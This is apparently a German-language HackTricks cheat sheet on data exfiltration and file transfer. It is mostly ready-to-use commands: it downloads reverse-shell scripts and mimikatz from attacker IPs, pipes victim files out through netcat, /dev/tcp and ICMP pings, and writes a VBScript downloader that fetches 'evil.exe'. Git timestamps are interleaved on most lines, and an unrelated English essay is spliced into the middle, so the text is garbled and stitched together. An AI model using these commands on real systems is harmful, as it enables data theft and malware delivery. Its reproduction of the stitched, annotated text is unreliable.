2022-06-28 10:36:33 +00:00
# Exfiltration
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 15:36:32 +00:00
< summary > < strong > Lernen Sie AWS-Hacking von Null auf Held mit< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2023-12-30 20:49:23 +00:00
2024-03-09 13:32:03 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten** , überprüfen Sie die [**ABONNEMENTPLÄNE** ](https://github.com/sponsors/carlospolop )!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch** ](https://peass.creator-spring.com )
2024-02-10 15:36:32 +00:00
* Entdecken Sie [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), unsere Sammlung exklusiver [**NFTs** ](https://opensea.io/collection/the-peass-family )
* **Treten Sie der** 💬 [**Discord-Gruppe** ](https://discord.gg/hRep4RUj7f ) oder der [**Telegram-Gruppe** ](https://t.me/peass ) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2024-03-24 13:22:09 +00:00
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) und [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) Github-Repositorys senden.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-14 23:35:25 +00:00
**Try Hard Security Group**
2024-03-24 13:22:09 +00:00
< figure > < img src = "../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:35:25 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2024-03-24 12:26:54 +00:00
## Häufig weißgelistete Domains zur Informationsweiterleitung
2023-06-14 00:31:26 +00:00
2024-03-09 13:32:03 +00:00
Überprüfen Sie [https://lots-project.com/ ](https://lots-project.com/ ), um häufig weißgelistete Domains zu finden, die missbraucht werden können
2023-06-14 00:31:26 +00:00
2024-03-14 23:35:25 +00:00
## Kopieren & Einfügen Base64
2020-07-15 15:43:14 +00:00
2022-07-21 20:01:55 +00:00
**Linux**
2020-07-15 15:43:14 +00:00
```bash
base64 -w0 < file > #Encode file
base64 -d file #Decode file
```
2022-07-21 20:01:55 +00:00
**Windows**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
2023-03-15 12:03:23 +00:00
## HTTP
2020-07-15 15:43:14 +00:00
2022-07-21 20:01:55 +00:00
**Linux**
2020-07-15 15:43:14 +00:00
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
2022-07-21 20:01:55 +00:00
**Windows**
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2024-02-10 15:36:32 +00:00
### Dateien hochladen
2020-07-15 15:43:14 +00:00
2023-03-28 10:15:00 +00:00
* [**SimpleHttpServerWithFileUploads** ](https://gist.github.com/UniIsland/3346170 )
2024-03-24 13:22:09 +00:00
* [**SimpleHttpServer printing GET and POSTs (also headers)** ](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149 )
2024-02-10 15:36:32 +00:00
* Python-Modul [uploadserver ](https://pypi.org/project/uploadserver/ ):
2023-03-15 12:03:23 +00:00
```bash
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
2024-02-10 15:36:32 +00:00
# With basic auth:
2023-03-15 12:03:23 +00:00
# python3 -m uploadserver --basic-auth hello:world
2020-07-15 15:43:14 +00:00
2023-03-15 12:03:23 +00:00
# Send a file
2024-02-10 15:36:32 +00:00
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
2023-03-15 12:03:23 +00:00
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
```
2024-02-10 15:36:32 +00:00
### **HTTPS-Server**
2021-09-07 12:22:24 +00:00
```python
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
2021-09-07 13:32:20 +00:00
# https://localhost:443
2021-09-07 12:22:24 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON 2
2021-09-07 12:22:24 +00:00
import BaseHTTPServer, SimpleHTTPServer
import ssl
2021-09-07 13:32:20 +00:00
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
2021-09-07 12:22:24 +00:00
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON3
2022-02-02 14:59:07 +00:00
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### USING FLASK
2022-02-02 14:59:07 +00:00
from flask import Flask, redirect, request
from urllib.parse import quote
2024-02-10 15:36:32 +00:00
app = Flask(__name__)
@app .route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
2022-05-01 12:41:36 +00:00
###
2021-09-07 12:22:24 +00:00
```
2023-03-15 12:03:23 +00:00
## FTP
2020-07-15 15:43:14 +00:00
2024-02-10 15:36:32 +00:00
### FTP-Server (Python)
2020-07-15 15:43:14 +00:00
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
2024-02-10 15:36:32 +00:00
### FTP-Server (NodeJS)
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
2024-02-10 15:36:32 +00:00
### FTP-Server (pure-ftp)
2020-07-15 15:43:14 +00:00
```bash
apt-get update & & apt-get install pure-ftp
```
```bash
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
2024-02-10 15:36:32 +00:00
### **Windows**-Client
2020-07-15 15:43:14 +00:00
```bash
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
2023-03-15 12:03:23 +00:00
## SMB
2020-07-15 15:43:14 +00:00
2024-02-10 15:36:32 +00:00
Kali als Server
2020-07-15 15:43:14 +00:00
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
2024-02-10 15:36:32 +00:00
Oder erstellen Sie einen SMB-Share **mit Samba** :
2020-07-15 15:43:14 +00:00
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
2024-02-10 15:36:32 +00:00
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
2020-07-15 15:43:14 +00:00
#Start samba
service smbd restart
```
2024-03-24 13:22:09 +00:00
# Exfiltration
## Introduction
2024-03-24 12:26:54 +00:00
2024-03-24 13:22:09 +00:00
Exfiltration is the unauthorized transfer of data from a target system. This can be achieved through various methods, such as:
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
- Uploading data to an external server
- Sending data via email
- Using covert channels
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
## Techniques
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
### Data Compression
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
Data can be compressed before exfiltration to reduce its size and avoid detection.
2020-07-15 15:43:14 +00:00
2024-03-24 13:22:09 +00:00
### Data Encryption
2020-07-15 15:43:14 +00:00
2024-03-24 13:22:09 +00:00
Encrypting data before exfiltration can prevent unauthorized access to the stolen information.
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
### Steganography
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
Hiding data within other files or images can help evade detection during exfiltration.
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
## Tools
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
There are various tools available for exfiltrating data from a target system, such as:
- **Netcat**: A versatile networking utility that can be used for transferring data.
- **Wget**: A command-line utility for downloading files from the web.
2024-03-24 12:26:54 +00:00
- **Curl**: Another command-line tool for transferring data with support for various protocols.
2024-02-10 15:36:32 +00:00
2024-03-24 13:22:09 +00:00
## Conclusion
2024-03-24 12:26:54 +00:00
2024-03-24 13:22:09 +00:00
Exfiltration is a critical phase of a successful attack, and understanding the various techniques and tools available is essential for a hacker.
2020-07-15 15:43:14 +00:00
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
2023-03-15 12:03:23 +00:00
## SCP
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:03 +00:00
Der Angreifer muss SSHd laufen haben.
2020-07-15 15:43:14 +00:00
```bash
2024-02-10 15:36:32 +00:00
scp < username > @< Attacker_IP > :< directory > /< filename >
2020-07-15 15:43:14 +00:00
```
2023-03-15 12:03:23 +00:00
## SSHFS
2022-07-06 10:22:29 +00:00
2024-02-10 15:36:32 +00:00
Wenn das Opfer SSH hat, kann der Angreifer ein Verzeichnis vom Opfer zum Angreifer mounten.
2022-07-06 10:22:29 +00:00
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions < Target username > @< Target IP address > :< Full path to folder > / /mnt/sshfs/
```
2024-03-24 13:22:09 +00:00
## Netzwerk-Kommunikation
2020-07-15 15:43:14 +00:00
```bash
nc -lvnp 4444 > new_file
nc -vn < IP > 4444 < exfil_file
```
2024-03-09 13:32:03 +00:00
## /dev/tcp
2024-02-10 15:36:32 +00:00
2024-03-09 13:32:03 +00:00
### Datei vom Opfer herunterladen
2020-07-15 15:43:14 +00:00
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
2024-03-24 13:22:09 +00:00
### Datei auf Opfer hochladen
Wenn Sie Zugriff auf das Opfersystem haben, können Sie Dateien auf das System hochladen, um Daten zu exfiltrieren. Dies kann über verschiedene Methoden wie Remote-Verwaltungstools, Dateifreigabe oder sogar über E-Mail-Anhänge erfolgen. Stellen Sie sicher, dass Sie die erforderlichen Berechtigungen haben und dass die Dateiübertragung nicht entdeckt wird.
2020-07-15 15:43:14 +00:00
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat < & 6 > file.txt
```
2024-02-10 15:36:32 +00:00
Dank an ** @BinaryShadow \_**
2020-07-15 15:43:14 +00:00
2023-03-15 12:03:23 +00:00
## **ICMP**
2020-07-15 15:43:14 +00:00
```bash
2022-09-13 11:57:23 +00:00
# To exfiltrate the content of a file via pings you can do:
2020-07-15 15:43:14 +00:00
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line < IP attacker > ; done
2021-10-30 12:23:41 +00:00
#This will 4bytes per ping packet (you could probably increase this until 16)
2020-07-15 15:43:14 +00:00
```
```python
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
2024-02-10 15:36:32 +00:00
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
2020-07-15 15:43:14 +00:00
sniff(iface="tun0", prn=process_packet)
```
2023-03-15 12:03:23 +00:00
## **SMTP**
2020-07-15 15:43:14 +00:00
2024-02-10 15:36:32 +00:00
Wenn Sie Daten an einen SMTP-Server senden können, können Sie mit Python einen SMTP erstellen, um die Daten zu empfangen:
2020-07-15 15:43:14 +00:00
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
2023-03-15 12:03:23 +00:00
## TFTP
2020-07-15 15:43:14 +00:00
2024-02-10 15:36:32 +00:00
Standardmäßig in XP und 2003 (bei anderen muss es während der Installation explizit hinzugefügt werden)
2020-07-15 15:43:14 +00:00
2024-03-14 23:35:25 +00:00
In Kali **starten Sie den TFTP-Server** :
2020-07-15 15:43:14 +00:00
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
2024-02-10 15:36:32 +00:00
**TFTP-Server in Python:**
2020-07-15 15:43:14 +00:00
```bash
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p < PORT > < IFACE > < FOLDER >
```
2024-03-24 13:22:09 +00:00
Auf dem **Opfer** verbinden Sie sich mit dem Kali-Server:
2020-07-15 15:43:14 +00:00
```bash
tftp -i < KALI-IP > get nc.exe
```
2023-03-15 12:03:23 +00:00
## PHP
2020-07-15 15:43:14 +00:00
2024-02-10 15:36:32 +00:00
Laden Sie eine Datei mit einem PHP-Oneliner herunter:
2020-07-15 15:43:14 +00:00
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?> " > down2.php
```
2023-03-15 12:03:23 +00:00
## VBScript
2020-07-15 15:43:14 +00:00
2024-03-24 13:22:09 +00:00
VBScript ist eine von Microsoft entwickelte Skriptsprache, die in Windows-Umgebungen häufig verwendet wird. Es kann verwendet werden, um Dateien zu exfiltrieren, indem es sie in Base64 kodiert und dann in einer HTTP-Anfrage an einen Remote-Server sendet.
2024-02-10 15:36:32 +00:00
```bash
Attacker> python -m SimpleHTTPServer 80
```
**Opfer**
2020-07-15 15:43:14 +00:00
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
```bash
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
2023-03-15 12:03:23 +00:00
## Debug.exe
2020-07-15 15:43:14 +00:00
2024-03-24 12:26:54 +00:00
Das Programm `debug.exe` ermöglicht nicht nur die Inspektion von Binärdateien, sondern hat auch die **Fähigkeit, sie aus Hexadezimalwerten neu zu erstellen** . Das bedeutet, dass `debug.exe` anhand eines Hexadezimalwerts einer Binärdatei die Binärdatei generieren kann. Es ist jedoch wichtig zu beachten, dass debug.exe eine **Einschränkung beim Zusammenstellen von Dateien bis zu 64 KB Größe** hat.
2024-02-07 04:06:18 +00:00
```bash
# Reduce the size
2020-07-15 15:43:14 +00:00
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
2023-03-15 12:03:23 +00:00
## DNS
2021-04-01 12:07:45 +00:00
2022-06-28 10:36:33 +00:00
* [https://github.com/62726164/dns-exfil ](https://github.com/62726164/dns-exfil )
2022-04-28 16:01:33 +00:00
2024-03-14 23:35:25 +00:00
**Try Hard Security Group**
2024-03-24 13:22:09 +00:00
< figure > < img src = "../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:35:25 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 15:36:32 +00:00
< summary > < strong > Lernen Sie AWS-Hacking von Null auf Held mit< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2023-12-30 20:49:23 +00:00
2024-03-24 13:22:09 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten** , überprüfen Sie die [**ABONNEMENTPLÄNE** ](https://github.com/sponsors/carlospolop )!
2024-03-09 13:32:03 +00:00
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch** ](https://peass.creator-spring.com )
2024-02-10 15:36:32 +00:00
* Entdecken Sie [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), unsere Sammlung exklusiver [**NFTs** ](https://opensea.io/collection/the-peass-family )
* **Treten Sie der** 💬 [**Discord-Gruppe** ](https://discord.gg/hRep4RUj7f ) oder der [**Telegram-Gruppe** ](https://t.me/peass ) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2024-03-24 13:22:09 +00:00
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) und [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
< / details >